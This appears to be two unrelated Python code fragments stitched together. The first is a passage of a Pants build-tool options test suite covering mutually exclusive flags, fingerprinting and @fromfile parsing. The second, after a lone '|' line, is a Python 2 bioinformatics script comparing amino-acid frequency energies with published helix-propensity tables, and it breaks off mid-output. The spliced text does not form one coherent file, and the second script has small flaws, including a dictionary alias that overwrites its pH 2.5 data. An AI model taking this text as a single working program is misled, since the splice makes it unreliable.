options = self._parse(flags=flags, env=env, config=config)
if scope:
options.for_scope(scope)
else:
options.for_global_scope()
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
)
assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo",
env={"PANTS_STALE_MUTEX_B": "bar"},
scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo",
env={"PANTS_STALE_CRUFTY_OLD": "bar"},
scope="stale",
)
assert_mutually_exclusive_raised(
flags="--mutex-foo=foo",
config={"GLOBAL": {"mutex_bar": "bar"}},
)
assert_mutually_exclusive_raised(
flags="--new-name=foo",
config={"GLOBAL": {"old_name": "bar"}},
)
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo",
config={"stale": {"mutex_b": "bar"}},
scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-old=foo",
config={"stale": {"crufty_new": "bar"}},
scope="stale",
)
# Mutexes should not impact the `dest`. We spot check that here.
def assert_option_set(
flags: str,
option: str,
expected: str | None,
) -> None:
options = self._parse(flags=flags).for_global_scope()
assert getattr(options, option) == expected
assert_option_set("--mutex-foo=orz", "mutex_foo", "orz")
assert_option_set("--mutex-foo=orz", "mutex_bar", None)
assert_option_set("--mutex-foo=orz", "mutex_baz", None)
assert_option_set("--mutex-bar=orz", "mutex_bar", "orz")
def test_complete_scopes(self) -> None:
class OptCls:
deprecated_options_scope = "deprecated"
assert {ScopeInfo("foo"), ScopeInfo("bar")} == set(
Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar")])
)
assert {ScopeInfo("foo"), ScopeInfo("bar", OptCls), ScopeInfo("deprecated", OptCls)} == set(
Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar", OptCls)])
)
with pytest.raises(Options.DuplicateScopeError):
Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar"), ScopeInfo("foo")])
def test_get_fingerprintable_for_scope(self) -> None:
options = self._parse(
flags='--store-true-flag --num=88 compile --modifycompile="blah blah blah" '
'--modifylogs="durrrr" -- -d -v'
)
# NB: Passthrough args end up on our `--modifypassthrough` arg.
pairs = options.get_fingerprintable_for_scope("compile")
assert [(str, "blah blah blah"), (str, ["-d", "-v"])] == pairs
def test_fingerprintable(self) -> None:
options = self._parse(
flags="--implicitly-fingerprinted=shall_be_fingerprinted"
+ " --explicitly-fingerprinted=also_shall_be_fingerprinted"
+ " --explicitly-not-fingerprinted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope(GLOBAL_SCOPE)
assert (str, "shall_be_fingerprinted") in pairs
assert (str, "also_shall_be_fingerprinted") in pairs
assert (str, "shant_be_fingerprinted") not in pairs
def test_fingerprintable_daemon_only(self) -> None:
options = self._parse(
flags="--explicitly-daemoned=shall_be_fingerprinted"
+ " --explicitly-not-daemoned=shant_be_fingerprinted"
+ " --implicitly-not-daemoned=also_shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope(GLOBAL_SCOPE, daemon_only=True)
assert (str, "shall_be_fingerprinted") in pairs
assert (str, "shant_be_fingerprinted") not in pairs
assert (str, "also_shant_be_fingerprinted") not in pairs
def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
def _do_assert_fromfile(dest, expected, contents, passthru_flags=""):
with temporary_file(binary_mode=False) as fp:
fp.write(contents)
fp.close()
options = parse_func(dest, fp.name, passthru_flags)
assert expected == options.for_scope("fromfile")[dest]
_do_assert_fromfile(dest="string", expected="jake", contents="jake")
_do_assert_fromfile(dest="intvalue", expected=42, contents="42")
_do_assert_fromfile(
dest="dictvalue",
expected={"a": 42, "b": (1, 2)},
contents=dedent(
"""
{
'a': 42,
'b': (
1,
2
)
}
"""
),
)
_do_assert_fromfile(
dest="listvalue",
expected=["a", "1", "2"],
contents=dedent(
"""
['a',
1,
2]
"""
),
)
_do_assert_fromfile(
dest="passthru_listvalue",
expected=["a", "1", "2", "bob", "@jake"],
contents=dedent(
"""
['a',
1,
2]
"""
),
passthru_flags="bob @jake",
)
expected_append = expected_append or [1, 2, 42]
append_contents = append_contents or dedent(
"""
[
1,
2,
42
]
"""
)
_do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
def parse_func(dest, fromfile, passthru_flags):
return self._parse(
flags=f"fromfile --{dest.replace('_', '-')}=@{fromfile} -- {passthru_flags}"
)
# You can only append a single item at a time with append flags, ie: we don't override the
# default list like we do with env of config. As such, send in a single append value here
# instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
def parse_func(dest, fromfile, passthru_flags):
return self._parse(
flags=f"fromfile -- {passthru_flags}", config={"fromfile": {dest: f"@{fromfile}"}}
)
self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
def parse_func(dest, fromfile, passthru_flags):
return self._parse(
flags=f"fromfile -- {passthru_flags}",
env={f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"},
)
self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".json", binary_mode=False) as fp:
json.dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
assert val == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_yaml(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".yaml", binary_mode=False) as fp:
yaml.safe_dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
assert val == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_yaml_trailing_newlines_matter(self) -> None:
with temporary_file(suffix=".yaml", binary_mode=False) as fp:
fp.write(
dedent(
"""\
a: |+
multiline
"""
)
)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
assert {"a": "multiline\n"} == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_relative_to_build_root(self) -> None:
with temporary_dir(root_dir=get_buildroot()) as tempdir:
dirname = tempdir.split("/")[-1]
tempfile = Path(tempdir, "config")
tempfile.write_text("{'a': 'multiline\\n'}")
with pushd(tempdir):
options = self._parse(flags=f"fromfile --dictvalue=@{dirname}/config")
assert {"a": "multiline\n"} == options.for_scope("fromfile")["dictvalue"]
def test_fromfile_error(self) -> None:
options = self._parse(flags="fromfile --string=@/does/not/exist")
with pytest.raises(FromfileError):
options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
assert "@/does/not/exist" == options.for_scope("fromfile").string
def test_ranked_value_equality(self) -> None:
none = RankedValue(Rank.NONE, None)
some = RankedValue(Rank.HARDCODED, "some")
assert RankedValue(Rank.NONE, None) == none
assert RankedValue(Rank.HARDCODED, "some") == some
assert some != none
assert some == RankedValue(Rank.HARDCODED, "some")
assert some != RankedValue(Rank.HARDCODED, "few")
assert some != RankedValue(Rank.CONFIG, "some")
def test_pants_global_with_default(self) -> None:
"""This test makes sure values under [DEFAULT] still gets read."""
# This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
# tell us that we can remove the cast.
config = cast(
Dict[str, Dict[str, Any]],
{"DEFAULT": {"num": "99"}, "GLOBAL": {"store_true_flag": True}},
)
global_options = self._parse(config=config).for_global_scope()
assert 99 == global_options.num
assert global_options.store_true_flag
def test_double_registration(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options.register(GLOBAL_SCOPE, "--foo-bar")
with pytest.raises(OptionAlreadyRegistered):
options.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
# We serialize options to JSON e.g., when uploading stats.
# This test spot-checks that enum types can be serialized.
options = self._parse(flags="enum-opt --some-enum=another-value")
json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
def test_list_of_enum_single_value(self) -> None:
options = self._parse(flags="other-enum-scope --some-list-enum=another-value")
assert [self.SomeEnumOption.another_value] == options.for_scope(
"other-enum-scope"
).some_list_enum
def test_list_of_enum_default_value(self) -> None:
options = self._parse(flags="other-enum-scope --some-list-enum-with-default=another-value")
assert [
self.SomeEnumOption.yet_another,
self.SomeEnumOption.another_value,
] == options.for_scope("other-enum-scope").some_list_enum_with_default
options = self._parse()
assert [self.SomeEnumOption.yet_another] == options.for_scope(
"other-enum-scope"
).some_list_enum_with_default
def test_list_of_enum_from_config(self) -> None:
options = self._parse(
config={"other-enum-scope": {"some_list_enum": "['one-more', 'a-value']"}}
)
assert [self.SomeEnumOption.one_more, self.SomeEnumOption.a_value] == options.for_scope(
"other-enum-scope"
).some_list_enum
def test_list_of_enum_duplicates(self) -> None:
options = self._parse(
flags="other-enum-scope --some-list-enum=\"['another-value', 'one-more', 'another-value']\""
)
with pytest.raises(ParseError, match="Duplicate enum values specified in list"):
options.for_scope("other-enum-scope")
def test_list_of_enum_invalid_value(self) -> None:
options = self._parse(
flags="other-enum-scope --some-list-enum=\"['another-value', 'not-a-value']\""
)
with pytest.raises(ParseError, match="Error computing value for --some-list-enum"):
options.for_scope("other-enum-scope")
def test_list_of_enum_set_single_value(self) -> None:
options = self._parse(
flags="other-enum-scope --some-list-enum-with-default=\"['another-value']\""
)
assert [self.SomeEnumOption.another_value] == options.for_scope(
"other-enum-scope"
).some_list_enum_with_default
def test_list_of_enum_append(self) -> None:
options = self._parse(
flags="other-enum-scope --some-list-enum-with-default=\"+['another-value']\""
)
assert [
self.SomeEnumOption.yet_another,
self.SomeEnumOption.another_value,
] == options.for_scope("other-enum-scope").some_list_enum_with_default
def test_list_of_enum_remove(self) -> None:
options = self._parse(
flags="other-enum-scope --some-list-enum-with-default=\"-['yet-another']\""
)
assert [] == options.for_scope("other-enum-scope").some_list_enum_with_default
|
#!/usr/bin/env python
"""
Typical usage:
amino_acid_energy.py [candidate.txt] < all_sequences.txt
In this example, "all_sequences.txt" contains a large list of sequences
from which the probability of each character appearing is determined.
The natural logarithm of the probability of each type of character
is returned to the user, along with the probability that the corresponding
amino acid would occur at random. This is written to the standard-error.
An optional argument ("candidate.txt") contains a sequence.
If you provide an optional argument (in this example "candidate.txt"),
this program assumes the file contains a sequence of letters, and
that you wish to calculate the probability of that sequence
appearing by chance (using the probabilities you calculated above).
This program calculates the natural logarithm of this probability
and writes it to the standard-out.
"""
import sys
import math
def CalcSequenceEnergy(s,energy):
tot_ener = 0.0
for c in s:
if c in energy:
tot_ener += energy[c]
else:
sys.stderr.write('\nError: sequence argument contains non-standard amino acid: \''+c+'\'\n')
exit(-1)
return tot_ener
def CalcSequenceEnergyErr(s,energy,delta_energy):
tot_ener = 0.0
var_tot_ener = 0.0
for c in s:
if c in energy:
tot_ener += energy[c]
var_tot_ener += (delta_energy[c]**2)
else:
sys.stderr.write('\nError: sequence argument contains non-standard amino acid: \''+c+'\'\n')
exit(-1)
return tot_ener,math.sqrt(var_tot_ener)
def main():
type_count= {} #keep track of the number of times
#each character in the sequence
#appears in the entire file.
#lines = sys.stdin.readlines()
#for line in lines:
for line in sys.stdin:
line = line.strip()
# Count the number of residues of each type
for c in line:
if (c in type_count):
type_count[c] += 1
else:
type_count[c] = 1
# What is the probability of finding each type of amino acid (P[c]) ?
type_count_tot = 0
for c in type_count:
type_count_tot += type_count[c]
########## OLD SIMPLE VERSION ############
#for c in type_count:
# P[c] = float(type_count[c])/type_count_tot
# # Suppose x = type_count[c] / N
# # is the probability of encountering a certain letter (c)
# # in a huge list of N letters (in this example type_count_tot = N).
# # It's easy to show that the uncertainty in the estimate for
# # the probability is sqrt(x*(1-x)/N) for large N.
# deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
########## NEW VERSION ##############
# The probabilities should sum up to the probability that
# a randomly chosen amino acid happens to be in a helix
#NAA_tot=2123360 # number of amino acids in the database
#NAA_hel=942456 # number of amino acids in the database in helices
#NAA_she=509097 # number of amino acids in the database in sheets
# After throwing away the PDB files containing "MEMBRANE" OR " NMR", we get
NAA_tot=1986157 # number of amino acids in the database
NAA_hel=886428 # number of amino acids in the database in helices
NAA_she=471407 # number of amino acids in the database in sheets
prior__helix = (float(NAA_hel)/float(NAA_tot))
prior__sheet = (float(NAA_she)/float(NAA_tot))
P = {}
deltaP = {}
for c in type_count:
conditional_probability__c = float(type_count[c])/type_count_tot
#######################################
# Giovanni's method:
P[c] = conditional_probability__c
deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
#######################################
# Andrew's method:
#
#joint_probability__c_helix = conditional_probability__c * prior__helix
#joint_probability__c_sheet = conditional_probability__c * prior__sheet
#P[c] = joint_probability__c_helix
#P[c] = joint_probability__c_sheet
#
# Uncertainty:
# Suppose x =
# is the probability of encountering a certain letter (c)
# in a huge list of N letters (in this example N=NAA_tot).
# It's easy to show that the uncertainty in the estimate for
# the probability is sqrt(x*(1-x)/N) for large N.
#deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / NAA_tot)
#deltaP[c] = math.sqrt((P[c]*(1.0-P[c])) / type_count_tot)
#
#######################################
# This information is somewhat meaningless because
# some amino acids simply occur more often than others
# even in the absence of evolutionary pressure.
#
# I want to divide this probability (P[c]) by the probability that
# this amino acid (c) would occure due to a random mutation in the DNA.
# Pevo[c] is the probability that an amino acid would be type c
# due to random mutations (in the absence of evolutionary pressure).
# I assume (perhaps incorrectly), that this is mostly determined by
# the number of codons that code for that amino acid.
Pevo = {}
num_codons = {'F':2,
'L':6,
'I':3,
'M':1,
'V':4,
'R':6,
'K':2,
'D':2,
'E':2,
'N':2,
'Q':2,
'H':2,
'S':6,
'P':4,
'T':4,
'A':4,
'Y':2,
'W':1,
'C':2,
'G':4}
tot_num_codons = 0 # should end up 4^3-3 = 61
for c in num_codons:
tot_num_codons += num_codons[c]
for c in num_codons:
Pevo[c] = float(num_codons[c]) / float(tot_num_codons)
ener = {}
delta_ener = {}
for c in type_count:
if c in Pevo: #<-if c is one of the standard 20 amino acids)
if ((P[c] > 0.0) and (Pevo[c] > 0.0)): #<-log(P) undefined if P=0
# The next variable can be used to estimate energetic penalties
# as a result of substituting an amino acid of type c into
# the environment from which you collected your sequence data.
# Such energetic penalties may explain why some amino acids
# appear more or less often than you would expect by
# considering the number of codons that code for them.
ener[c] = math.log(Pevo[c] / P[c])
delta_ener[c] = deltaP[c] / P[c]
# If there were uncertainty in Pevo, we would have to use:
#delta_lnPevo = deltaPevo[c] / Pevo[c]
#delta_ener[c] = math.sqrt(delta_lnP**2 + delta_lnPevo**2)
# Amino acid 1-letter and 3-letter codes:
OneToThree = {'E':'Glu',
'K':'Lys',
'D':'Asp',
'A':'Ala',
'Q':'Gln',
'F':'Phe',
'N':'Asn',
'M':'Met',
'L':'Leu',
'I':'Ile',
'Y':'Tyr',
'V':'Val',
'W':'Trp',
'G':'Gly',
'T':'Thr',
'H':'His',
'R':'Arg',
'S':'Ser',
'P':'Pro',
'C':'Cys'}
ThreeToOne = dict([[v,k] for k,v in OneToThree.items()])
# Experimental measures of helix propensity:
#
# This one from (Horovitz,Matthews,&Fersht JMB 1992 227:560-568) is in kCal/mole
# For this experiment, they mutated the amino acid at position 32 within a
# helix (at positions 26-34 of barnase: TKSEAQALG, according to 1BNR.pdb).
# The resulting mutants were of the form: TKSEAQxLG
# ^
# mutate here
helixPropensityHorovitz_3ltr = {'Ala':0.00,
'Arg':0.14,
'Lys':0.19,
'Met':0.31,
'Leu':0.35,
'Ser':0.41,
'Gln':0.48,
'Glu':0.55,
'Asn':0.66,
'Phe':0.69,
'Asp':0.71,
'His':0.78,
'Thr':0.79,
'Ile':0.81,
'Tyr':0.82,
'Val':0.88,
'Gly':0.91,
'Trp':0.98,
'Cys':1.00,
'Pro':4.08}
helixPropensityHorovitz = {}
for AA in helixPropensityHorovitz_3ltr:
c = ThreeToOne[AA]
helixPropensityHorovitz[c] = helixPropensityHorovitz_3ltr[AA]
# Alternate helix propensity metric:
# (from O'Neil and Degrado, Science 1990, 250:646-651)
# Again, units are in kCal/mole.
# The experiment substituted residues into the following sequence:
# Ac-EWEALEKKLAALE-X-KLQALEKKLEALEHG at position "X"
# This is a designed protein, not a natural protein
helixPropensityONeil_3ltr = {'Ala':-0.77,
'Arg':-0.68,
'Lys':-0.65,
'Met':-0.50,
'Leu':-0.62,
'Ser':-0.35,
'Gln':-0.33,
'Glu':-0.27,
'Asn':-0.07,
'Phe':-0.41,
'Asp':-0.15,
'His':-0.06,
'Thr':-0.11,
'Ile':-0.23,
'Tyr':-0.17,
'Val':-0.14,
'Gly':0.00,
'Trp':-0.45,
'Cys':-0.23,
'Pro': 3.00}
helixPropensityONeil = {}
for AA in helixPropensityONeil_3ltr:
c = ThreeToOne[AA]
helixPropensityONeil[c] = helixPropensityONeil_3ltr[AA]
# Blaber, Zhuang, Matthews, Science 1993, 260(5114), 1637-1640
# (Michael Blaber, Xue-jun Zhang, Brian W. Matthews)
# In this experiment, they mutated residue 44 of T4 lysozyme
# and measured the change in the mutant's stability.
# They also crystalized all (or nearly all) 20 mutants.
# (According to 2LZM.pdb, this is part of a helix, from residues 39-50
# NAAKSELDKA. In this study, they mutated residue 44 "S")
helixPropensityBlaber44_3ltr = {'Ala':-0.96,
'Leu':-0.92,
'Met':-0.86,
'Ile':-0.84,
'Gln':-0.80,
'Arg':-0.77,
'Lys':-0.73,
'Tyr':-0.72,
'Val':-0.63,
'Phe':-0.59,
'Trp':-0.58,
'His':-0.57,
'Thr':-0.54,
'Glu':-0.53,
'Ser':-0.53,
'Asp':-0.42,
'Cys':-0.42,
'Asn':-0.39,
'Gly':0.00,
'Pro':2.50}
helixPropensityBlaber44 = {}
for AA in helixPropensityBlaber44_3ltr:
c = ThreeToOne[AA]
helixPropensityBlaber44[c] = helixPropensityBlaber44_3ltr[AA]
# The next couple tables were taken from table 1 of
# Myers+Pace+Scholtz, Biochemistry 1997,36:10923-10929
#
# (Incidentally, what they called the "wild type" sequence
# based on residues 13-29 of RNase T1:
# SSDVSTAQAAGYKLHED
# However they muted residue 23 to A
# to stabilize the helix. This resulted in:
# SSDVSTAQAAAYKLHED
# They then replaced the residue at position 21
# with 19 different amino acids (all except proline)
#
# SSDVSTAQxAAYKLHED
# ^
# mutated here
helixPropensityMyersProteinPh2p5 = {'A':0.00,
'C':0.74,
'D':-0.33,
'E':-0.05,
'F':0.57,
'G':0.90,
'H':0.56,
'I':0.44,
'K':0.51,
'L':0.13,
'M':0.15,
'N':-0.34,
'Q':0.26,
'R':0.41,
'S':0.49,
'T':0.57,
'V':0.66,
'W':0.30,
'Y':0.39}
# pH=7 data taken from table 1 of Myers+Pace+Scholtz, Biochemistry 1997
# (right-most column) when available. If not available, this data
# was taken from the pH=2.5 column. (Perhaps this is okay because,
# if I understand correctly, only two of the amino acid's protonation
# states, D,E was effected by the change in pH, and the others
# did not change that much. However I remain confused by this
# I think this is what these authors did when they plotted
# figure 3. They didn't explain which pH they used, but I assume that
# it is reflected in the protonation state of the amino acids in the
# Still, some amino acids, like H,Q,S have different propensities
# at pH=2.5 and 7, and I don't know which value they used
# but I'm guessing they used the pH=7 value. This was confusing.)
helixPropensityMyersProteinPh7 = helixPropensityMyersProteinPh2p5
helixPropensityMyersProteinPh7_corrections = {'A':0.0,
'D':0.71,
'E':0.69,
'H':0.17,
'Q':0.40,
'S':0.40}
for c in helixPropensityMyersProteinPh7_corrections:
helixPropensityMyersProteinPh7[c] = helixPropensityMyersProteinPh7_corrections[c]
# Taken from table 2 of Myers+Pace+Scholtz, Biochemistry 1997,36:10923-10929
helixPropensityMyersPeptidePh2p5 = {'A':0.0,
'C':0.53,
'D':0.66,
'E':0.17,
'F':0.61,
'G':0.98,
'H':1.2,
'I':0.38,
'K':0.45,
'L':0.25,
'M':0.18,
'N':0.66,
'P':1.1,
'Q':0.31,
'R':0.56,
'S':0.51,
'T':0.71,
'V':0.66,
'W':0.14,
'Y':0.45}
helixPropensityMyersPeptidePh7 = {'A':0.0,
'C':0.51,
'D':0.68,
'E':0.31,
'F':0.59,
'G':0.95,
'H':0.67,
'I':0.29,
'K':0.30,
'L':0.19,
'M':0.12,
'N':0.58,
'P':1.1,
'Q':0.29,
'R':0.38,
'S':0.42,
'T':0.59,
'V':0.61,
'W':0.02,
'Y':0.31}
# The help the reader, I also subtract off the average of each energy.
# (First I must calculate these averages.)
ave_ener = 0.0
n_temp = 0
for c in ener:
if c != 'P': # According to Horovitz, Proline is an outlier. exclude it
ave_ener += ener[c]
n_temp += 1
if n_temp > 0:
ave_ener /= n_temp
avePropHorovitz = 0.0
for AA in helixPropensityHorovitz_3ltr:
if AA != 'Pro': # According to Horovitz, Proline is an outlier. exclude it
avePropHorovitz += helixPropensityHorovitz_3ltr[AA]
avePropHorovitz /= (len(helixPropensityHorovitz_3ltr) - 1)
avePropONeil = 0.0
# The help the reader, subtract off the average. (First calculate the average)
for AA in helixPropensityONeil_3ltr:
if AA != 'Pro': # According to Horovitz, Proline is an outlier. exclude it
avePropONeil += helixPropensityONeil_3ltr[AA]
avePropONeil /= (len(helixPropensityONeil_3ltr) - 1)
count = 0
avePropBlaber44 = 0.0
# The help the reader, subtract off the average. (First calculate the average)
for c in helixPropensityBlaber44:
if c != 'P': # According to Horovitz, Proline is an outlier. exclude it
avePropBlaber44 += helixPropensityBlaber44[c]
count += 1
avePropBlaber44 /= count
count = 0
avePropMyersProtein= 0.0
# The help the reader, subtract off the average. (First calculate the average)
for c in helixPropensityMyersProteinPh7:
if c != 'P': # According to Horovitz, Proline is an outlier. exclude it
avePropMyersProtein += helixPropensityMyersProteinPh7[c]
count += 1
avePropMyersProtein /= count
count = 0
avePropMyersPeptide= 0.0
# The help the reader, subtract off the average. (First calculate the average)
for c in helixPropensityMyersPeptidePh7:
if c != 'P': # According to Horovitz, Proline is an outlier. exclude it
avePropMyersPeptide += helixPropensityMyersPeptidePh7[c]
count += 1
avePropMyersPeptide /= count
##############################################################################
# Now sort the amino acids by energy, and write out the table
kB = 0.0019872 #Boltzmann's constant for converting T in Kelvin into kcal/mole
T = 300.0
sys.stdout.write('\nProbabilities for each type (sum = '+str(prior__helix)+'):\n')
#sys.stdout.write('C AA Horovitz1992 ONeil1990 ln(Pevo(AA)/P(AA))*kB*T delta(ln(P(AA)))*kB*T P(AA) deltaP Pevo(AA)\n')
sys.stdout.write('C AA P(AA) deltaP Pevo(AA) ln(Pevo(AA)/P(AA))*kB*T delta(ln(P(AA)))*kB*T ONeil1990 Horovitz1992 Blaber1993 Myers1997pep Myers1997pro\n')
#for c in ener:
# sys.stdout.write(c)
#sort by value (energy):
#ener_sorted = sorted(ener.iteritems(), key=lambda(k,v):v)
#sort by key (amino acid):
#ener_sorted = sorted(ener.iteritems(), key=lambda(k,v):k)
## alternately, to sort by Horovitsz's energy values:
##ener_sorted = sorted(helixPropensityHorovitz.iteritems(), key=lambda(k,v):v)
#for ener_pair in ener_sorted:
# c = ener_pair[0]
AAsorted = sorted(ThreeToOne.iteritems(), key=lambda(k,v):k)
for AA_c_pair in AAsorted:
c = AA_c_pair[1]
#sys.stdout.write(c)
if c in OneToThree:
sys.stdout.write(' '+OneToThree[c])
else:
sys.stdout.write(' ???')
#sys.stdout.write(' '+str(P[c])+' '+str(deltaP[c]))
sys.stdout.write((' %5.3f' % (P[c]*100.0))+(' %5.3f'%(deltaP[c]*100.0)))
#sys.stdout.write((' & %5.3f' % (P[c]*100.0))+('\ \pm\ %5.3f'%(deltaP[c]*100.0)))
if c in Pevo: #<-if c is one of the standard 20 amino acids)
#sys.stdout.write(' '+str(Pevo[c]))
sys.stdout.write(' %5.3f' % (Pevo[c]*100.0))
#sys.stdout.write(' & %5.3f' % (Pevo[c]*100.0))
ave_ener=0.0
#sys.stdout.write((' %5.s3f'%((ener[c]-ave_ener)*kB*T)) + (' %5.3f'%(delta_ener[c]*kB*T)))
#sys.stdout.write(('& %5.s3f'%((ener[c]-ave_ener)*kB*T)) + (' %5.3f'%(delta_ener[c]*kB*T)))
#sys.stdout.write(' & %5.3f'%((ener[c]-ave_ener)*kB*T))
sys.stdout.write(' %5.3f'%((ener[c]-ave_ener)*kB*T))
if c in helixPropensityONeil:
sys.stdout.write(' %4.2f' % (helixPropensityONeil[c]-avePropONeil))
if c in helixPropensityHorovitz:
sys.stdout.write(' %4.2f' % (helixPropensityHorovitz[c]-avePropHorovitz))
if c in helixPropensityBlaber44:
sys.stdout.write(' %4.2f' % (helixPropensityBlaber44[c]-avePropBlaber44))
if c in helixPropensityMyersPeptidePh7:
sys.stdout.write(' %4.2f' % (helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide))
if c in helixPropensityMyersProteinPh7:
sys.stdout.write(' %4.2f' % (helixPropensityMyersProteinPh7[c]-avePropMyersProtein))
sys.stdout.write('\n')
# Now, calculate the Pearlson covariance (R) between the different metrics:
cov11_Horovitz = 0.0
cov22_Horovitz = 0.0
cov12_Horovitz = 0.0
cov11_ONeil = 0.0
cov22_ONeil = 0.0
cov12_ONeil = 0.0
cov11_Blaber44 = 0.0
cov22_Blaber44 = 0.0
cov12_Blaber44 = 0.0
cov11_MyersProtein = 0.0
cov22_MyersProtein = 0.0
cov12_MyersProtein = 0.0
cov11_MyersPeptide = 0.0
cov22_MyersPeptide = 0.0
cov12_MyersPeptide = 0.0
num_common_AA_Horovitz = 0
num_common_AA_ONeil = 0
num_common_AA_Blaber44 = 0
num_common_AA_MyersProtein = 0
num_common_AA_MyersPeptide = 0
for c in ener:
if (c in helixPropensityHorovitz) and (c != 'P'): #exclude proline
# Note: I left in the kB*T factor even though it cancels out later
num_common_AA_Horovitz += 1
cov11_Horovitz += (kB*T*(ener[c]-ave_ener))**2
cov22_Horovitz += (helixPropensityHorovitz[c]-avePropHorovitz)**2
cov12_Horovitz += kB*T*(ener[c]-ave_ener)*(helixPropensityHorovitz[c]-avePropHorovitz)
if (c in helixPropensityONeil) and (c != 'P'): #exclude proline:
# Note: I left in the kB*T factor even though it cancels out later
num_common_AA_ONeil += 1
cov11_ONeil += (kB*T*(ener[c]-ave_ener))**2
cov22_ONeil += (helixPropensityONeil[c]-avePropONeil)**2
cov12_ONeil += kB*T*(ener[c]-ave_ener)*(helixPropensityONeil[c]-avePropONeil)
if (c in helixPropensityBlaber44) and (c != 'P'): #exclude proline:
# Note: I left in the kB*T factor even though it cancels out later
num_common_AA_Blaber44 += 1
cov11_Blaber44 += (kB*T*(ener[c]-ave_ener))**2
cov22_Blaber44 += (helixPropensityBlaber44[c]-avePropBlaber44)**2
cov12_Blaber44 += kB*T*(ener[c]-ave_ener)*(helixPropensityBlaber44[c]-avePropBlaber44)
if (c in helixPropensityMyersPeptidePh7) and (c != 'P'): #exclude proline:
num_common_AA_MyersPeptide += 1
cov11_MyersPeptide += (kB*T*(ener[c]-ave_ener))**2
cov22_MyersPeptide += (helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide)**2
cov12_MyersPeptide += kB*T*(ener[c]-ave_ener)*(helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide)
if (c in helixPropensityMyersProteinPh7) and (c != 'P'): #exclude proline:
num_common_AA_MyersProtein += 1
cov11_MyersProtein += (kB*T*(ener[c]-ave_ener))**2
cov22_MyersProtein += (helixPropensityMyersProteinPh7[c]-avePropMyersProtein)**2
cov12_MyersProtein += kB*T*(ener[c]-ave_ener)*(helixPropensityMyersProteinPh7[c]-avePropMyersProtein)
sys.stdout.write('\n-------------------------------------\n')
sys.stdout.write(' sigma = '+str(math.sqrt(cov11_Horovitz/num_common_AA_Horovitz))+'\n')
sys.stdout.write(' sigmaHorovitz = '+str(math.sqrt(cov22_Horovitz/num_common_AA_Horovitz))+'\n')
sys.stdout.write(' R = '+str(math.sqrt((cov12_Horovitz*cov12_Horovitz)/(cov11_Horovitz*cov22_Horovitz)))+'\n')
sys.stdout.write('-------------------------------------\n')
sys.stdout.write(' sigma = '+str(math.sqrt(cov11_ONeil/num_common_AA_ONeil))+'\n')
sys.stdout.write(' sigmaONeil = '+str(math.sqrt(cov22_ONeil/num_common_AA_ONeil))+'\n')
sys.stdout.write(' R = '+str(math.sqrt((cov12_ONeil*cov12_ONeil)/(cov11_ONeil*cov22_ONeil)))+'\n')
sys.stdout.write('-------------------------------------\n')
sys.stdout.write(' sigma = '+str(math.sqrt(cov11_Blaber44/num_common_AA_Blaber44))+'\n')
sys.stdout.write(' sigmaBlaber44 = '+str(math.sqrt(cov22_Blaber44/num_common_AA_Blaber44))+'\n')
sys.stdout.write(' R = '+str(math.sqrt((cov12_Blaber44*cov12_Blaber44)/(cov11_Blaber44*cov22_Blaber44)))+'\n')
sys.stdout.write('-------------------------------------\n')
sys.stdout.write(' sigma = '+str(math.sqrt(cov11_MyersProtein/num_common_AA_MyersProtein))+'\n')
